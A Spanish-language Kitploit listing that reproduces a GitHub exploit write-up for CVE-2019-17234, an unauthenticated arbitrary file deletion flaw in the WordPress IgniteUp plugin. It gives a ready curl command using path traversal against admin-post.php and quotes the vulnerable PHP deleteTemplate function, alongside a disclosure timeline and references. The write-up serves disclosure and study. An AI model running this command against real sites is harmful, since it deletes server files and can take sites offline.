Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-17234b-Exploit — El plugin IgniteUp de Wordpress < 3.4.1 permite a usuarios no autenticados eliminar archivos arbitrariamente del servidor web, lo que posiblemente cause una denegación de servicio (DoS). | Kitploit
Herramientas/GitHubGitHub/administra1tor/cve-2019-17234b-exploit
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubadministra1tor/cve-2019-17234b-exploit

CVE-2019-17234b-Exploit

El plugin IgniteUp de Wordpress < 3.4.1 permite a usuarios no autenticados eliminar archivos arbitrariamente del servidor web, lo que posiblemente cause una denegación de servicio (DoS).

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 5 añosAún no revisado

Vulnerabilidad del plugin Wordpress IgniteUp

El plugin IgniteUp de Wordpress v3.4 y versiones anteriores permite a usuarios remotos no autenticados eliminar arbitrariamente cualquier archivo del servidor web objetivo, pudiendo provocar un ataque de denegación de servicio.

Cronología de CVE-2019-17234

La vulnerabilidad fue reportada al equipo de wordpress.org el 20 de septiembre de 2019 y la nueva versión del plugin 3.4.1 fue publicada el 08 de noviembre de 2019.[3]

Antecedentes

IgniteUp es un plugin popular de Wordpress que permite realizar la configuración y gestión trivial de páginas de aterrizaje para que los usuarios sepan que el sitio está próximo a lanzarse, en mantenimiento o en construcción.

El plugin incluye de serie 5 plantillas gratuitas por defecto: believe,cleaner,glass,launcher,offline.

Los nombres de las plantillas se resaltan porque se requiere un parámetro correcto [template-name] para realizar una solicitud válida al servidor web y explotar la vulnerabilidad.

Código de explotación (curl)

[ADVERTENCIA]

El siguiente comando de ejemplo podría ser suficiente para romper tu sitio web de Wordpress, en este caso eliminando los archivos principales del plugin IgniteUp.

root@kitploit:~
curl -d "action=admin_init&delete_template=[template-name]/../../" -X POST http(s)://[target-website]/wp-admin/admin-post.php

dummy example:
curl -d "action=admin_init&delete_template=believe/../../" -X POST http://localhost/wp-admin/admin-post.php

[NOTA] El comando anterior realiza un directory traversal dentro de la ruta relativa del plugin; con los permisos adecuados (755 para los directorios del servidor web y 644 para los archivos del servidor web) y con el propietario adecuado (www-data, apache user, etc...), la superficie de ataque se limita hasta el directorio raíz del servidor (p. ej. /var/www/html).

Análisis del código de la vulnerabilidad

La función culpable que introduce esta vulnerabilidad se resalta a continuación; el archivo de referencia se encuentra en wp-content/plugins/igniteup/includes/class-coming-soon-creator.php, archivo que, como sugiere el nombre, se encarga de la creación de nuevas plantillas personalizadas y de la eliminación de las predeterminadas/creadas.

V3.4

root@kitploit:~
add_action('admin_init', array($this, 'deleteTemplate'));
...
...
public function deleteTemplate()
{
   if (!isset($_POST['delete_template']) || empty($_POST['delete_template']))
      return;
   $folder_name = $_POST['delete_template'];
   $path = dirname(CSCS_FILE) . '/includes/templates/';
   array_map('unlink', glob($path . $folder_name . '/*.*'));
   rmdir($path . $folder_name);
   unlink($path . '/' . $folder_name . '.php');
   header('Location: ' . $_SERVER['REQUEST_URI']);
}

admin_init en la primera línea es un hook de acción de Wordpress. Los hooks[2] constituyen la base de cómo los plugins y los temas interactúan con WordPress Core, pero también son usados extensamente por el propio núcleo.

Desafortunadamente, la función asociada al hook de acción, deleteTemplate(), no tiene comprobaciones de administrador/usuario; esto le da al lector suficientes pistas sobre cómo realizar dicha acción. Mirando el código es trivial detectar el parámetro POST de php delete_template; esto, sumado a la acción del hook admin_init, es conocimiento suficiente para intentar realizar una solicitud POST al servidor web a través de la interfaz /wp-admin/admin-post.php, como se señala en el párrafo del código de explotación.

[NOTA PERSONAL] Analizando el comportamiento habitual del plugin desde la perspectiva de un usuario administrador de Wordpress, resulta bastante extraño encontrar esta función (supongo que es un resto de versiones anteriores), porque:

  1. No hay ninguna opción para eliminar plantillas disponible en la v3.4 desde el panel de administración; solo la activación/desactivación del plugin o la «creación» (descarga) de plantillas premium ($$$).
  2. El comportamiento del código es básicamente incorrecto; la función unlink() en circunstancias normales nunca terminará correctamente, ya que, en la construcción de los parámetros de la función, la '/' entre $path y $folder_name no debería estar presente; ya se ha añadido una barra en la declaración de la variable $path.

Aquí hay una muestra de lo que sucede durante el unlink cuando intento destruir una plantilla.

attack.png

Pendientes

prueba con admin-ajax.php comparación con v3.4.1

Autores

  • Andrea Vignudelli -(https://github.com/administra1tor)

Referencias

  • Gracias a Jerome Bruandet por informar del problema.

[fuente] https://blog.nintechnet.com/multiple-vulnerabilities-in-wordpress-igniteup-coming-soon-and-maintenance-mode-plugin/

[1] changelog de la v3.4.1 - https://it.wordpress.org/plugins/igniteup/#developers

[2] hooks de Wordpress - https://developer.wordpress.org/plugins/hooks/

[3] Referencia de CVE-2019-17234 en NIST - https://nvd.nist.gov/vuln/detail/CVE-2019-17234

Descargar herramienta